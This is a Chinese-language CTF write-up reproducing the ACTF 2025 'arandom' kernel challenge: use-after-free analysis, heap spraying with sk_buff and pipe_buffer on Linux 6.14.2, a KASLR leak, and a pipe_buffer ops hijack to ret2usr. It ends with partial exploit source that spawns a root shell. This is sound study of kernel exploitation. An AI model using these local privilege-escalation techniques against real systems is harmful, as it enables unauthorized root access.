[ACTF 2025] arandom复现

本文总阅读量

最近复现的一个很随机的内核题,感觉学到了很多东西,特此记录一下

防护检查

题目给了Kconfig,从中我们可以得到该内核版本为Linux 6.14.2,算很新的内核了,之前的很多手法大概率都会失效

启动脚本开启了kaslr,ban掉了io_uring,但是没有开启smep/smap,意味着可以打ret2usr,仅需泄漏内核地址+控制内核执行流即可提权

原赛题出题人/etc目录权限搞错了,导致可以自己造一个伪/etc/passwd然后大大方方登陆root非预期

内核题搞错权限见过很多次了,但是我没有一次在赛时发现过 :(

逆向分析

题目包含了一个漏洞模块arandom.ko。逆向分析逻辑很简单,最主要的函数是arandom_ioctl:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
__int64 __fastcall arandom_ioctl(file *file, unsigned int a2, __int64 a3)
{
__int64 v4; // rax
__int64 v5; // r12
__int64 rand_offset; // rax

mutex_lock(&arandom_mutex);
if ( a2 == 4099 )
{
v5 = -1LL;
if ( allocated )
{
rand_offset = AAA.rand_offset;
v5 = -22LL;
if ( rand_offset + 4 <= (unsigned __int64)AAA.rand_size )
{
v5 = 0LL;
*(_DWORD *)((char *)buffer + rand_offset) = AAA.rand_value;
}
}
}
else
{
if ( a2 > 0x1003 )
{
if ( a2 == 4100 )
{
v5 = -14LL;
if ( copy_to_user(a3, &AAA, 12LL) )
goto out;
goto LABEL_6;
}
if ( a2 == 0x1005 )
{
v4 = AAA.rand_offset;
if ( *(_QWORD *)((char *)buffer + v4) == AAA.rand_value
&& v4 == *(_QWORD *)((char *)buffer + v4 + 16)
&& *(_QWORD *)((char *)buffer + v4 + 24) == AAA.rand_size )
{
*(_QWORD *)((char *)buffer + v4 + 32) = &get_random_bytes;
}
LABEL_6:
v5 = 0LL;
goto out;
}
LABEL_24:
v5 = -25LL;
goto out;
}
if ( a2 == 4097 )
{
v5 = -1LL;
if ( !allocated )
{
buffer = (void *)_kmalloc_noprof(AAA.rand_size, 3264LL);
if ( buffer )
{
allocated = 1;
v5 = 0LL;
}
else
{
v5 = -12LL;
}
}
}
else
{
if ( a2 != 4098 )
goto LABEL_24;
v5 = -1LL;
if ( allocated && !freed )
{
v5 = 0LL;
kfree(buffer);
freed = 1;
}
}
}
out:
mutex_unlock(&arandom_mutex);
return v5;

有一个很明显的UAF,但是只能使用一次;还有一个地址泄漏,不过需要构造条件。其中全局变量AAA的类型如下所示:

1
2
3
4
5
6
struct arandom_params // sizeof=0xC
{
u32 rand_size;
u32 rand_offset;
u32 rand_value;
};

其在初始化的时候被赋予了随机变量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int __cdecl arandom_init()
{
u32 v0; // eax

get_random_bytes(&AAA, 4LL);
v0 = AAA.rand_size & 0x7FFF;
if ( (AAA.rand_size & 0x7FFF) == 0 )
v0 = 0x8000;
AAA.rand_size = v0;
get_random_bytes(&AAA.rand_offset, 4LL);
AAA.rand_offset %= (unsigned __int64)AAA.rand_size - 4;
get_random_bytes(&AAA.rand_value, 4LL);
misc_register(&arandom_miscdev);
return 0;
}

可以看出这是一个非常随机的题,申请随机大小的heap,并在随机位置写入随机字节(但是长度固定为DWORD)
仔细分析发现,rand_size的范围在0x0001~0x8000之间(随机值的低15位为0时会被改成0x8000),而且有大约一半的概率落在0x4000以上(例如0x7xxx)的范围内;
这个大小在kmalloc中会进入__kmalloc_large_noprof函数(其实大于两个页的size(0x2000)就会触发了),并会进一步进入函数___kmalloc_large_node,最终调用函数alloc_pages_node_noprof,直接从buddy system中申请对应order的页

0x7xxx大小对应的为order-3的页分配,这会一次性返回(2^3=)8个页

下面我们就假设申请的size为0x7xxx,即在触发order-3页分配的情况下进行进一步的利用(此时成功率大约在75%左右)

事实上,size在0x4000~0x7xxx大小之间的size都满足要求,所以成功率还要高一些

要利用UAF,我们首先要将其kfree掉。通过__kmalloc_large_noprof函数得到的heap,在kfree的时候会直接触发page free,从而再次回到buddy system的order-3里边去
因此,我们就从order-3 page(size 0x8000)开始寻找利用手段

漏洞利用

寻找堆喷对象

要取出order-3的page其实有挺多办法的,除了嗯喷pipe_buffer从order-0一路取到order-3之外,我们也可以通过申请新的对应大小的slab来正好取走这个order-3

在第一步选用pipe_buffer需要堆喷大量的pipe,很容易超出最大文件打开限制(即使在修改rlimit的情况下)

通过查看/proc/slabinfo中的内容,我们可以了解到不同的slab的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bash-5.2# cat /proc/slabinfo | tail -n 15
kmalloc-8k 8 8 8192 4 8 : tunables 0 0 0 : slabdata 2 2 0
kmalloc-4k 80 80 4096 8 8 : tunables 0 0 0 : slabdata 10 10 0
kmalloc-2k 176 176 2048 8 4 : tunables 0 0 0 : slabdata 22 22 0
kmalloc-1k 344 344 1024 8 2 : tunables 0 0 0 : slabdata 43 43 0
kmalloc-512 392 392 512 8 1 : tunables 0 0 0 : slabdata 49 49 0
kmalloc-256 496 496 256 16 1 : tunables 0 0 0 : slabdata 31 31 0
kmalloc-128 320 320 128 32 1 : tunables 0 0 0 : slabdata 10 10 0
kmalloc-64 1152 1152 64 64 1 : tunables 0 0 0 : slabdata 18 18 0
kmalloc-32 1197 1280 32 128 1 : tunables 0 0 0 : slabdata 10 10 0
kmalloc-16 1280 1280 16 256 1 : tunables 0 0 0 : slabdata 5 5 0
kmalloc-8 1536 1536 8 512 1 : tunables 0 0 0 : slabdata 3 3 0
kmalloc-192 1050 1050 192 21 1 : tunables 0 0 0 : slabdata 50 50 0
kmalloc-96 3780 3780 96 42 1 : tunables 0 0 0 : slabdata 90 90 0
kmem_cache_node 192 192 64 64 1 : tunables 0 0 0 : slabdata 3 3 0
kmem_cache 160 160 256 16 1 : tunables 0 0 0 : slabdata 10 10 0

该信息的部分格式如下:

1
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> ...

我们聚焦第六列的<pagesperslab>,该项代表了每一个slab需要的page。可以发现kmalloc-4k和kmalloc-8k正好满足order-3 page(8页)的需求,因此我们尝试堆喷大小为0x1000(即kmalloc-4k)的结构体来触发allocate_slab函数,最终在函数alloc_slab_page中进行直接的order-3页分配

错误的堆喷对象:struct msg_msg

事实上,我的第一反应就是struct msg_msg结构体,因为它kmalloc一次申请的大小最大就是0x1000,于是尝试堆喷struct msg_msg

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * First spray attempt from the write-up: create MSG_NUM System V message
 * queues and send one message to each.
 *
 * Every message carries 0x1000 - 0x30 bytes of payload; the 0x30 is
 * presumably the size of the kernel's msg_msg header, so that header plus
 * payload fill one 0x1000-byte allocation (confirm against the target
 * kernel). The payload of message i is filled with the byte value (char)i.
 */
void spray() {
#define MSG_NUM 56
  int ms_qid[MSG_NUM];
  char *msg_buf = (char *)malloc(0x1000);

  for (int i = 0; i < MSG_NUM; ++i) {
    ms_qid[i] = get_msg_queue();
    memset(msg_buf, (char)i, 0x1000);
    /* write_msg() stores the message type in the first long of msg_buf. */
    check(write_msg(ms_qid[i], msg_buf, 0x1000 - 0x30, 1));
  }
  success("pre spray msg_msg successfully\n");

  /* The kernel copied the payload during msgsnd(); the staging buffer is
   * no longer needed. */
  free(msg_buf);
}

一开始是没问题的,甚至不需要刻意喷射很多的结构体,一般第一波就能取到kfree后order-3 pages,通过UAF,我们可以构造条件满足arandom_ioctl中的要求,从而拿到内核基址绕过kaslr

之后问题来了,下一步我打算将struct msg_msg free掉,换成pipe_buffer来利用其随机任意写,却发现无论如何也堆喷不中。

最后在源码处发现问题,原来该内核版本中struct msg_msg的第一页的分配使用的是自己独立的kmem_cache:

该特性其实在Linux v6.11版本就引入了

v6.14.2 完整版link
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static struct msg_msg *alloc_msg(size_t len)
{
struct msg_msg *msg;
struct msg_msgseg **pseg;
size_t alen;

alen = min(len, DATALEN_MSG);
msg = kmem_buckets_alloc(msg_buckets, sizeof(*msg) + alen, GFP_KERNEL);
// 这里不是kmalloc了
if (msg == NULL)
return NULL;

msg->next = NULL;
msg->security = NULL;

len -= alen;
pseg = &msg->next;
while (len > 0) {
struct msg_msgseg *seg;

cond_resched();

alen = min(len, DATALEN_SEG);
seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
// 这里仍然是kmalloc,但是我们很难利用
if (seg == NULL)
goto out_err;
*pseg = seg;
seg->next = NULL;
pseg = &seg->next;
len -= alen;
}

return msg;

out_err:
free_msg(msg);
return NULL;
}

其中msg_buckets的定义就在其上方:

1
2
3
4
5
6
7
8
9
10
11
static kmem_buckets *msg_buckets __ro_after_init;

static int __init init_msg_buckets(void)
{
msg_buckets = kmem_buckets_create("msg_msg", SLAB_ACCOUNT,
sizeof(struct msg_msg),
DATALEN_MSG, NULL);

return 0;
}
subsys_initcall(init_msg_buckets);

在slabinfo里边其实也有体现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bash-5.2# cat /proc/slabinfo
...
msg_msg-8k 0 0 8192 4 8 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-4k 0 0 4096 8 8 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-2k 0 0 2048 8 4 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-1k 0 0 1024 8 2 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-512 0 0 512 8 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-256 0 0 256 16 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-128 0 0 128 32 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-64 0 0 64 64 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-32 0 0 32 128 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-16 0 0 16 256 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-8 0 0 8 512 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-192 0 0 192 21 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-96 0 0 96 42 1 : tunables 0 0 0 : slabdata 0 0 0
...

可见多了和一般kmalloc-xxx一样的不同大小的slab,意味着它们不会与相同大小的kmalloc-xxx合并了,之前的想法属于cross-cache,除非构造cross-cache attack,否则是不可能成功的

更换堆喷对象:struct sk_buff

为此专门看了一眼源码,确保是kmalloc了之后才采用的

同样能完成读写数据的可供堆喷的结构体还有struct sk_buff,我们不能在一棵树上吊死

还是之前的思路,堆喷取数据验证,然后写数据满足条件,拿到内核基地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
...
// INFO: Step 0x02: spray sk_buff
step("spray sk_buff");
#define SOCKET_NUM 8
#define SK_BUFF_NUM 10
const uint64_t skb_reserve_size = 320;
const uint64_t skb_size = page_size - skb_reserve_size;

int sk_sockets[SOCKET_NUM][2];
char *skb_buf = (char *)malloc(0x1000);

for (int i = 0; i < SOCKET_NUM; i++) {
check(socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]));
memset(skb_buf, (char)i, skb_size);
memcpy(skb_buf, "hamoood", 0x8);
memset(skb_buf + offset, 0, 0x20);
memcpy(skb_buf + offset, &AAA.rand_value, 0x4);
memcpy(skb_buf + offset + 0x10, &AAA.rand_offset, 0x4);
memcpy(skb_buf + offset + 0x18, &AAA.rand_size, 0x4);

for (int j = 0; j < SK_BUFF_NUM; ++j) {
check(write(sk_sockets[i][0], skb_buf, skb_size));
}
}
success("spray sk_buff successfully\n");

// INFO: Step 0x03: check & read sk_buff
step("check & read sk_buff");
char *skb_recv = (char *)malloc(0x1000);

check(ioctl(fd, 0x1005)); // check
info("check buffer\n");

info("read sk_buff length %#x\n", offset);

for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; ++j) {
check(read(sk_sockets[i][1], skb_recv, skb_size));

uint64_t possible_addr = *(uint64_t *)(skb_recv + offset + 0x20);
if ((possible_addr & 0xffffffff00000000) == 0xffffffff00000000) {
success("find kernel addr at No.%d: %#lx\n", i,
*(uint64_t *)(skb_recv + offset + 0x20));
kernel_base = possible_addr - calc(0xffffffff81907850);
success("find kernel base: %#lx\n", kernel_base);
goto FIND;
}
}
}
if (kernel_base == 0) {
err_exit("not found");
}
...

其实这种堆喷在结构体AAA的rand_size满足kmalloc-4k的时候依旧管用,稍微增加了一点成功率

依旧不用喷射很多对象就可以拿到该order-3。接下来就是将其free掉,换pipe_buffer上场尝试控制执行流

控制执行流:struct pipe_buffer

之前说过,在没有smep/smap的情况下,只要能让执行流导向用户空间,我们就能get root(当然前提是拿到基地址)。
因此,pipe_buffer这一可控大小,能够被劫持控制流(只需劫持函数表struct pipe_buf_operations *ops),且内容重复(为0x28大小的结构体数组),随机命中率高的结构体就自然而然地成为这一步利用的首选结构体

太适合了

struct sk_buff在读完数据后自动kfree,而我取数据的方法就是将其读空,因此不需要额外操作将其free掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
FIND:
// INFO: Step 0x04: spray pipe_buffer
step("spray pipe_buffer");

struct pipe_buffer {
void *page;
unsigned int offset, len;
void *ops;
unsigned int flags;
unsigned long private;
} pipe_example;

pipe_example.page = (void *)0xffffea0000000000;
pipe_example.len = 0x1000;
pipe_example.offset = 0x0;
pipe_example.ops = (void *)calc(0xffffffff8222bb80);
pipe_example.ops = NULL;
pipe_example.flags = 0x10;
pipe_example.private = 0x0;

const size_t pipe_buffer_size = sizeof(struct pipe_buffer);

info("pipe_buffer size: %#lx\n", pipe_buffer_size);

const uint64_t pipe_num = 0x10;
const uint64_t pipe_buf_size = page_size;

uint32_t inner_pipe_offset = offset % pipe_buffer_size;

char *pipe_buf = malloc(pipe_buf_size);
int pipe_fd[pipe_num][2];
// anon_pipe_buf_ops
for (int i = 0; i < pipe_num; ++i) {
check(pipe(pipe_fd[i]));
memset(pipe_buf, i, pipe_buf_size);
memcpy(pipe_buf, "find__me", 0x8);
check(write(pipe_fd[i][1], pipe_buf, pipe_buf_size));
check(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64));

for (int j = 0; j < 0x1; ++j) {
memset(pipe_buf + 0x8, j, 0x8);
check(write(pipe_fd[i][1], pipe_buf, 0x1000));
}
}
success("spray pipe_buffer successfully\n");

堆喷pipe_buffer并将其大小改成适合kmalloc-4k的,也是不需要很多就能取到刚被free的sk_buff

最后一步就是回归最初的arandom_ioctl,调用其随机写的功能,尝试劫持控制流
其实就是一个很碰运气的过程,要求是只要能够将pipe_buffer.ops域覆写成一个用户态地址即可,在用户态我们直接mmap伪造其函数表导向提权代码即可
如果真碰运气中了,只需将其close掉就能触发了

原理就是pipe_buffer在close的过程中会调用函数free_pipe_info,其关键内容如下:

1
2
3
4
5
6
7
...
for (i = 0; i < pipe->ring_size; i++) {
struct pipe_buffer *buf = pipe->bufs + i;
if (buf->ops)
pipe_buf_release(pipe, buf);
}
...

可见,它不管你其他地方有没有数据,只要ops域不为0,就尝试调用(该循环还是遍历所有pipe_buffer结构体数组的)
因此,只要往上边写上东西,就能劫持控制流了

最后一部分

其实这个随机验证是否覆写pipe_buffer.ops域完全可以放在最前边

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
// INFO: Step 0x05: write random value
step("write random value");

info("inner pipe offset: %#x\n", inner_pipe_offset);
info("before writting:\n");
dump_hex((char *)&pipe_example, 0x28);

memcpy((char *)(&pipe_example) + inner_pipe_offset, &AAA.rand_value, 0x4);

check(ioctl(fd, 0x1003)); // write
info("write buffer+%#x <- %#x\n", AAA.rand_offset, AAA.rand_value);

info("after writting:\n");
dump_hex((char *)&pipe_example, 0x28);

void *fake_ops = pipe_example.ops;
void *fake_ops_page = (void *)((uint64_t)fake_ops & 0xFFFFFFFFFffff000);
uint32_t fake_ops_page_offset = ((uint64_t)fake_ops & 0xfff);

if (pipe_example.ops == NULL) {
err_exit("Useless write");
}

success("affect pipe_buffer's ops successfully\n");
success("pipe_buffer's ops: %p\n", pipe_example.ops);

info("mmap page %p\n", fake_ops_page);
void *mmap_page = mmap(fake_ops_page, 0x3000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (mmap_page != fake_ops_page) {
err_exit("mmap error");
}

// INFO: Step 0x06: close pipes
step("close pipes");

// ffffffff812c8d40 T commit_creds
// ffffffff812c8fd0 T prepare_kernel_cred
commit_creds = (void *)calc(0xffffffff812c8d40);
prepare_kernel_cred = (void *)calc(0xffffffff812c8fd0);
init_cred = (void *)calc(0xffffffff82a54120);

uint64_t win_addr = (uint64_t)win;
info("win address: %#lx\n", win_addr);

for (int i = 0; i < 0x80; ++i) {
memcpy(fake_ops + i * 8, &win_addr, 0x8);
}

for (int i = 0; i < pipe_num; ++i) {
check(close(pipe_fd[i][0]));
check(close(pipe_fd[i][1]));
}

shell();

成功get root

叠了这么多随机因素,最终的成功率确实大打折扣,试了一下大概不到1/40的样子

get root :)

再贴个刷出来的极低概率情况

???

总结

这次复现让我阅读了大量源码(太痛苦了),但总算对Kernel内存管理机制入门了,之前各种疑惑点都得到了合理的解释,感觉通透了很多

终于悟了

最终Exp(部分)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
#include <stddef.h>
#define _GNU_SOURCE
#include "./klog.h"
#include <arpa/inet.h>
#include <fcntl.h>
#include <keyutils.h>
#include <linux/if_packet.h>
#include <linux/userfaultfd.h>
#include <net/if.h> // 添加 if_nametoindex 函数的头文件
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <threads.h>
#include <unistd.h>

#define TTY_MAGIC 0x200005401

#define KERNCALL __attribute__((regparm(3)))

/*
 * Print `len` bytes starting at `hex` as a hex dump through info().
 *
 * Each output row covers 16 bytes: the row offset, the two 64-bit words of
 * the row (read in host byte order), and the same 16 bytes as text, where
 * every byte outside the printable ASCII range 0x20..0x7e is shown as '.'.
 * A trailing partial row is padded with zero bytes in the numeric columns
 * and with '.' in the text columns. Nothing is printed when `len` is 0.
 *
 * @hex: start of the region to dump (only read, never modified)
 * @len: number of bytes to dump
 */
void dump_hex(const char *restrict hex, size_t len) {
  /* Round the length up to a whole number of 16-byte rows. */
  const size_t rows = len / 0x10 + ((len % 0x10) ? 1 : 0);
  const size_t padded_len = rows * 0x10;

  if (padded_len == 0) {
    return;
  }

  /* raw: zero-padded copy for the numeric columns.
   * text: printable rendering for the ASCII columns. */
  unsigned char *raw = calloc(padded_len, 1);
  char *text = malloc(padded_len);
  if (raw == NULL || text == NULL) {
    perror("dump_hex: malloc");
    free(raw);
    free(text);
    return;
  }

  memcpy(raw, hex, len);
  for (size_t pos = 0; pos < padded_len; ++pos) {
    unsigned char byte = raw[pos];
    int printable = pos < len && byte >= 0x20 && byte < 0x7f;
    text[pos] = printable ? (char)byte : '.';
  }

  for (size_t row = 0; row < rows; ++row) {
    const size_t base = row * 0x10;
    uint64_t low_word, high_word;
    /* One extra byte each so that "%s" sees a terminated string. */
    char left[0x9], right[0x9];

    memcpy(&low_word, raw + base, sizeof(low_word));
    memcpy(&high_word, raw + base + 0x8, sizeof(high_word));
    memcpy(left, text + base, 0x8);
    memcpy(right, text + base + 0x8, 0x8);
    left[0x8] = '\0';
    right[0x8] = '\0';

    info("0x%04lx: 0x%016lx 0x%016lx %s %s\n", (unsigned long)base,
         (unsigned long)low_word, (unsigned long)high_word, left, right);
  }

  free(text);
  free(raw);
}

void *(*prepare_kernel_cred)(void *)KERNCALL = (void *)0xffffffff81116130;
void (*commit_creds)(void *) KERNCALL = (void *)0xffffffff81115e60;
void *init_cred;

// cat /proc/kallsyms | grep "prepare_kernel_cred"
// sudo cat /proc/buddyinfo
// sudo cat /proc/pagetypeinfo

/*
* @fd: file descriptor of the opened device (/dev/arandom);
* @fd_tty: file descriptor of the opened /dev/ptmx;
*/
int fd, fd_tty;

uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t kernel_base, canary;

size_t page_size;
size_t *physmap_spray_arr[16000];
// uint64_t heap_address = 0;

/*
 * Rebase an address onto the current value of the global kernel_base.
 *
 * The constant 0xffffffff81000000 is subtracted from `addr` and kernel_base
 * is added, all in unsigned (wrapping) arithmetic. While kernel_base is
 * still 0 the result is simply the offset of `addr` from that constant.
 * (The constant is presumably the unrandomized kernel text base the symbol
 * addresses were taken against.)
 */
unsigned long long int calc(unsigned long long int addr) {
  const unsigned long long int reference_base = 0xffffffff81000000;
  unsigned long long int delta = addr - reference_base;

  return delta + kernel_base;
}

static pthread_t monitor_thread;

/*
 * Create a userfaultfd object, register [addr, addr + len) with it for
 * missing-page faults, and start `handler` on a new thread.
 *
 * The descriptor is passed to the thread as its argument, cast to void *.
 * The thread handle is stored in the file-scope monitor_thread. Each failing
 * step is reported through err_exit() with the name of the step.
 */
void register_userfaultfd(void *addr, unsigned long len,
                          void *(*handler)(void *)) {
  struct uffdio_api api_request;
  struct uffdio_register region_request;

  /* Create and enable the userfaultfd object. */
  long uffd_handle = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
  if (uffd_handle == -1) {
    err_exit("userfaultfd");
  }

  api_request.api = UFFD_API;
  api_request.features = 0;
  if (ioctl(uffd_handle, UFFDIO_API, &api_request) == -1) {
    err_exit("ioctl-UFFDIO_API");
  }

  /* Ask to be notified about accesses to pages that are not yet present. */
  region_request.range.start = (unsigned long)addr;
  region_request.range.len = len;
  region_request.mode = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd_handle, UFFDIO_REGISTER, &region_request) == -1) {
    err_exit("ioctl-UFFDIO_REGISTER");
  }

  if (pthread_create(&monitor_thread, NULL, handler, (void *)uffd_handle) !=
      0) {
    err_exit("pthread_create");
  }
}

/*
 * Calls the function pointer commit_creds with the pointer init_cred.
 * Both are file-scope variables; main() assigns them through calc() and
 * then fills its fake function table with the address of this function.
 */
void win() { commit_creds(init_cred); }

/*
 * Check whether the process now runs with uid 0. If so, print a success
 * banner and start /bin/sh; otherwise report the failure through
 * err_exit(). In either case the function then spins forever instead of
 * returning to its caller.
 */
void shell() {
  if (getuid() != 0) {
    err_exit("*** root failed ***");
  } else {
    success("[=============================================]\n");
    success("[===================" GREEN "SUCCESS" END
            "===================]\n");
    success("[=============================================]\n");
    system("/bin/sh");
  }

  /* Never return. */
  while (1) {
  }
}

// data for copy
uint64_t page[0x1000];

/*
* Thread routine that services userfaultfd page-fault events.
*
* @arg: the userfaultfd descriptor, passed as a long cast to void *.
*
* Loops forever: waits for the descriptor to become readable, reads one
* uffd_msg, and resolves the fault by copying page_size bytes from the
* file-scope `page` array into the page-aligned faulting address with
* UFFDIO_COPY. Any failure is reported through err_exit(). The loop has no
* exit, so the function never reaches a return statement.
*/
static void *fault_handler_thread(void *arg) {
static struct uffd_msg msg;
// NOTE(review): fault_cnt is never read or updated in this function.
static int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long)arg;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
// Block (timeout -1) until an event is available on the userfaultfd.
nready = poll(&pollfd, 1, -1);

/*
* When poll returns, a page fault has occurred.
* Extra work (for example a sleep()) can be inserted at this point.
*/
success("enter the fault handler\n");

// Opens /dev/ptmx while the faulting thread is still blocked and stores
// the descriptor in the global fd_tty.
// NOTE(review): this runs before the poll() result is checked below.
fd_tty = open("/dev/ptmx", O_RDWR | O_NOCTTY);

if (nready == -1)
err_exit("poll");

nread = read(uffd, &msg, sizeof(msg));

if (nread == 0)
err_exit("EOF on userfaultfd!\n");

if (nread == -1)
err_exit("read");

if (msg.event != UFFD_EVENT_PAGEFAULT)
err_exit("Unexpected event on userfaultfd\n");

// Resolve the fault: copy one page from `page` to the start of the page
// that contains the faulting address.
uffdio_copy.src = (unsigned long)page;
uffdio_copy.dst =
(unsigned long)msg.arg.pagefault.address & ~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
err_exit("ioctl-UFFDIO_COPY");
}
}
#ifndef ETH_P_ALL
#define ETH_P_ALL 0x0003
#endif
/*
 * Switch packet socket `s` to TPACKET_V3 and install an RX ring on it.
 *
 * The ring request uses the given block size, frame size, block count,
 * private-area size and block retire timeout; the frame count is derived as
 * (block_size * block_nr) / frame_size. If either setsockopt() call fails,
 * the name of the failing call is printed and the process exits with -1.
 */
void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv,
                                unsigned int timeout) {
  int version = TPACKET_V3;
  if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) <
      0) {
    puts("setsockopt(PACKET_VERSION)");
    exit(-1);
  }

  struct tpacket_req3 ring;
  memset(&ring, 0, sizeof(ring));
  ring.tp_block_size = block_size;
  ring.tp_frame_size = frame_size;
  ring.tp_block_nr = block_nr;
  ring.tp_frame_nr = (block_size * block_nr) / frame_size;
  ring.tp_retire_blk_tov = timeout;
  ring.tp_sizeof_priv = sizeof_priv;
  ring.tp_feature_req_word = 0;

  if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &ring, sizeof(ring)) < 0) {
    puts("setsockopt(PACKET_RX_RING)");
    exit(-1);
  }
}
/*
 * Create an AF_PACKET raw socket for all protocols, give it an RX ring via
 * packet_socket_rx_ring_init(), and bind it to the interface named "lo".
 *
 * Returns the socket descriptor. If socket() or bind() fails, the name of
 * the failing call is printed and the process exits with -1.
 */
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv,
                        int timeout) {
  int sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
  if (sock < 0) {
    puts("socket(AF_PACKET)");
    exit(-1);
  }

  packet_socket_rx_ring_init(sock, block_size, frame_size, block_nr,
                             sizeof_priv, timeout);

  struct sockaddr_ll bind_addr;
